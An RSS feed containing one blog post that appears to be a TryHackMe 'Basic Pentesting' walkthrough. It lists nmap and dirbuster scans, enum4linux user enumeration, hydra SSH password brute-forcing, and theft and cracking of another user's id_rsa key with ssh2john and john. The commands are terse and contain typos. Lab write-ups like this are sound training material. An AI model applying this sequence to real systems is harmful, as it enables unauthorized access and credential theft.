<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[THM ROOMS]]></title><description><![CDATA[THM ROOMS]]></description><link>https://tryhackmee.hashnode.dev</link><image><url>https://cdn.hashnode.com/res/hashnode/image/upload/v1593680282896/kNC7E8IR4.png</url><title>THM ROOMS</title><link>https://tryhackmee.hashnode.dev</link></image><generator>RSS for Node</generator><lastBuildDate>Sat, 05 Sep 2026 01:24:41 GMT</lastBuildDate><atom:link href="https://tryhackmee.hashnode.dev/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[BASIC PENTESTING]]></title><description><![CDATA[1)first scan with NMAP
nmap -T4 -p- -sV -sC -O 
2) DIRECTORY ENUMERATION
dirbuster&
paste the URL link in box and give wordlists and see result
3) RUN enum4linux tool to get usernames and workdomain
e]]></description><link>https://tryhackmee.hashnode.dev/basic-pentesting</link><guid isPermaLink="true">https://tryhackmee.hashnode.dev/basic-pentesting</guid><dc:creator><![CDATA[Piyush Shende]]></dc:creator><pubDate>Sat, 04 Apr 2026 17:05:21 GMT</pubDate><content:encoded><![CDATA[<h3>1)first scan with NMAP</h3>
<p>nmap -T4 -p- -sV -sC -O </p>
<h3>2) DIRECTORY ENUMERATION</h3>
<p>dirbuster&amp;</p>
<p>paste the URL link in box and give wordlists and see result</p>
<h3>3) RUN enum4linux tool to get usernames and workdomain</h3>
<p>enum4linux -a </p>
<h3>4)BRUTEFORCE PASSWORD FOR USER WE GOT IN EUNM4LINUX</h3>
<p>hydra -l username/username.txt -P /rockyou.txt ssh</p>
<h3>5) After Getting password for user login with ssh</h3>
<p>ssh user<a href="https://hashnode.com/@peerpush" class="user-mention" data-type="mention" title="IP">IP</a></p>
<p>get the id_rsa file of other user</p>
<h3>6) now crack the id_rsa file pass</h3>
<p>copy id_rsa text and in our terminal make a file name as id_rsa and paste its content in it</p>
<p>convert id_rsa file in hash with ssh2john tool - ssh2john id_rsa &gt; key</p>
<p>now we have hash in KEY file</p>
<p>now</p>
<p>john jey --worlkist=/rockyou.txt</p>
<p>now we got the password for other user</p>
<p>now chmod 600 id_rsa</p>
<p>now ssh 2nduser<a href="https://hashnode.com/@peerpush" class="user-mention" data-type="mention" title="IP">IP</a> and enter the password and get the flag</p>
]]></content:encoded></item></channel></rss>